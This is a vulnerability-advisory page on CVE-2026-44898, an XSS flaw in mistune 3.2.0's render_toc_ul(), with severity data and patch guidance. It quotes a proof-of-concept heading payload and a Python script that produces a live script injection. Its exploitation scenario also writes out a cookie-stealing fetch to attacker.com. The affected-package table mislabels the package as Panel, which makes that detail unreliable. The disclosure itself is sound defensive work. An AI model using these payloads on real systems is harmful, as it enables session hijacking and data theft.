CVE-2026-44898: mistune: XSS in TOC render via unescaped heading ID

GHSA-6269-cqxg-mhhv MEDIUM CISA: TRACK*
Published May 14, 2026
CISO Take

mistune 3.2.0's table-of-contents renderer inserts raw heading IDs directly into HTML anchor hrefs without HTML escaping, enabling XSS injection whenever user-controlled heading text is used as the anchor slug — which is the documented, default pattern for readable slug anchors in documentation generators. With 467 downstream dependents spanning documentation platforms, ML model card renderers, and Jupyter-adjacent tooling, the attack surface is broader than the package name suggests; the vulnerability also fires simultaneously with a companion heading-element XSS (H2), meaning a single malicious heading injects into both the TOC and the document body in a single render pass. Exploitation requires no privileges and only standard user interaction (viewing a rendered page), and no patch bypass complexity exists — crafting the payload takes seconds. Teams using mistune 3.2.0 with custom heading_id callbacks should upgrade to 3.2.1 immediately; as a short-term workaround, apply html.escape() to heading IDs before they reach render_toc_ul().

Sources: NVD GitHub Advisory OpenSSF

What is the risk?

CVSS 6.1 Medium, but practically elevated for AI/ML platform operators. No active exploitation confirmed (not in CISA KEV, no public exploit, no Nuclei template, EPSS not yet scored), but the attack is trivially reproducible from the published PoC. The OpenSSF Scorecard of 5.4/10 reflects moderate supply-chain hygiene for the upstream package. Risk is concentrated in multi-tenant environments — shared Jupyter hubs, AI documentation portals, model registries with user-editable model cards — where an attacker can submit Markdown that other authenticated users will render. Single-tenant or read-only deployments carry significantly lower exposure.

How does the attack unfold?

Malicious Content Submission
Attacker submits a Markdown document containing a crafted heading whose text encodes an XSS payload designed to break out of the href="#..." attribute context.
AML.T0049
Vulnerable TOC Rendering
mistune 3.2.0's render_toc_ul() formats the raw heading ID directly into an <a href> tag via Python string formatting with no html.escape() call, embedding a live <script> block in the generated HTML.
Browser-Side Script Execution
A victim user loads the rendered page; the browser parses and executes the injected script, which reads document.cookie and transmits session credentials to the attacker's server.
Session Hijacking and Data Access
Attacker replays the stolen session token to authenticate as the victim, accessing private models, API keys, and platform data without any server-side exploit.
AML.T0048.003

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Panel pip = 3.2.0 3.2.1
5.7K OpenSSF 6.6 479 dependents Pushed 15d ago 59% patched ~6d to patch Full package profile →

Do you use Panel? You're affected.

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 14% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps
  1. PATCH

    Upgrade mistune to 3.2.1 (commit 04880a0 escapes both the href ID and the heading element ID). Run: pip install 'mistune>=3.2.1'.

  2. AUDIT DEPENDENCIES

    Run 'pip show mistune' across all environments; audit requirements.txt, pyproject.toml, and lockfiles for pinned 3.2.0. Check transitive dependencies — mistune is often a transitive dep of documentation frameworks.

  3. WORKAROUND (if upgrade is blocked): Wrap heading ID values with html.escape() before passing to render_toc_ul(), or constrain heading_id callbacks to return only alphanumeric slugs (reject any input containing '<', '>', '"', or "'").

  4. DETECT

    Grep codebases for 'render_toc_ul', 'add_toc_hook', and 'heading_id=' to identify all call sites; review whether the heading_id callback returns raw user input.

  5. RUNTIME

    If running a platform that renders user Markdown, add a Content Security Policy header that blocks inline scripts (script-src 'self') as a defense-in-depth measure.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001
A.9.4 - Information security for AI systems
NIST AI RMF
GOVERN 6.2 - Third-Party AI Risk Contingency
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-44898?

mistune 3.2.0's table-of-contents renderer inserts raw heading IDs directly into HTML anchor hrefs without HTML escaping, enabling XSS injection whenever user-controlled heading text is used as the anchor slug — which is the documented, default pattern for readable slug anchors in documentation generators. With 467 downstream dependents spanning documentation platforms, ML model card renderers, and Jupyter-adjacent tooling, the attack surface is broader than the package name suggests; the vulnerability also fires simultaneously with a companion heading-element XSS (H2), meaning a single malicious heading injects into both the TOC and the document body in a single render pass. Exploitation requires no privileges and only standard user interaction (viewing a rendered page), and no patch bypass complexity exists — crafting the payload takes seconds. Teams using mistune 3.2.0 with custom heading_id callbacks should upgrade to 3.2.1 immediately; as a short-term workaround, apply html.escape() to heading IDs before they reach render_toc_ul().

Is CVE-2026-44898 actively exploited?

No confirmed active exploitation of CVE-2026-44898 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44898?

1. PATCH: Upgrade mistune to 3.2.1 (commit 04880a0 escapes both the href ID and the heading element ID). Run: pip install 'mistune>=3.2.1'. 2. AUDIT DEPENDENCIES: Run 'pip show mistune' across all environments; audit requirements.txt, pyproject.toml, and lockfiles for pinned 3.2.0. Check transitive dependencies — mistune is often a transitive dep of documentation frameworks. 3. WORKAROUND (if upgrade is blocked): Wrap heading ID values with html.escape() before passing to render_toc_ul(), or constrain heading_id callbacks to return only alphanumeric slugs (reject any input containing '<', '>', '"', or "'"). 4. DETECT: Grep codebases for 'render_toc_ul', 'add_toc_hook', and 'heading_id=' to identify all call sites; review whether the heading_id callback returns raw user input. 5. RUNTIME: If running a platform that renders user Markdown, add a Content Security Policy header that blocks inline scripts (script-src 'self') as a defense-in-depth measure.

What systems are affected by CVE-2026-44898?

This vulnerability affects the following AI/ML architecture patterns: ML documentation platforms, Jupyter notebook environments, Model card renderers, AI tool web UIs, Documentation generation pipelines.

What is the CVSS score for CVE-2026-44898?

CVE-2026-44898 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.

What is the AI security impact?

Affected AI Architectures

ML documentation platformsJupyter notebook environmentsModel card renderersAI tool web UIsDocumentation generation pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.9.4
NIST AI RMF: GOVERN 6.2
OWASP LLM Top 10: LLM03, LLM05

What are the technical details?

Original Advisory

## Summary `render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string — with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC. This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup. ## Details **File:** `src/mistune/toc.py` ```python def render_toc_ul(toc): ... for level, k, text in toc: # k = heading id (used verbatim as href fragment) # text = heading text (used verbatim as link label) item = '<a href="#{}">{}</a>'.format(k, text) # Neither k nor text is passed through escape() at any point ``` The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). The default hook assigns sequential numeric IDs that never contain user text: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_src = "# Introduction\n\n## Installation\n" _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) ``` Output — clean, safe TOC: ```html <ul> <li><a href="#toc_1">Introduction</a> <ul> <li><a href="#toc_2">Installation</a></li> </ul> </li> </ul> ``` **Step 2 — Enable the vulnerable `heading_id` callback** Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators: ```python def raw_id(token, index): return token.get("text", "") md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends: ``` ## x"><script>alert(document.cookie)</script><a href=" ``` When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`. **Step 4 — Observe script injection in the TOC output** ```python ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) ``` `render_toc_ul()` formats the malicious ID directly into the `<a href>`: ```python '<a href="#{}">{}</a>'.format(k, text) # becomes: '<a href="#x"><script>alert(document.cookie)</script><a href="">...<a/>' ``` Actual output: ```html <ul> <li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li> </ul> ``` The `<script>` block is live in the document. Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H4: render_toc_ul() puts raw heading ID into <a href> without escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook, render_toc_ul def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h4.md" bl_src = "# Introduction\n\n## Installation\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{bl_file}]\n{bl_src}") print("[toc output — safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h4.md" ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{ex_file}]\n{ex_src}") print("[toc output — script injected via href breakout]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>TOC output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H4 — TOC XSS</title><style>{CSS}</style></head><body> <h1>H4 — TOC render_toc_ul() XSS</h1> <p class="desc">render_toc_ul() in toc.py uses '&lt;a href="#{{}}"&gt;{{}}&lt;/a&gt;'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p> {case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h4.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h4.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin | | **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects | | **Availability** | Page crash or freeze available as secondary effect | **Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.

Exploitation Scenario

An attacker targeting an AI documentation platform or shared Jupyter environment that renders user-submitted Markdown with TOC generation enabled submits a notebook or model card containing the heading: '## x"><script>fetch("https://attacker.com/c?"+document.cookie)</script><a href="'. When a platform administrator or peer researcher views the rendered document, mistune 3.2.0 formats the heading text verbatim into the TOC anchor href via Python's .format(), producing a live <script> block in the page. The injected script exfiltrates the victim's session cookie to the attacker's server. The attacker replays the session token to authenticate as the victim, gaining access to private models, datasets, API keys, and subscription management — without ever touching the server. Because the companion H2 vulnerability fires simultaneously, the payload is injected twice: once in the TOC and once in the heading element itself, increasing the probability of execution even if one injection point is partially sanitized downstream.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 14, 2026

Related Vulnerabilities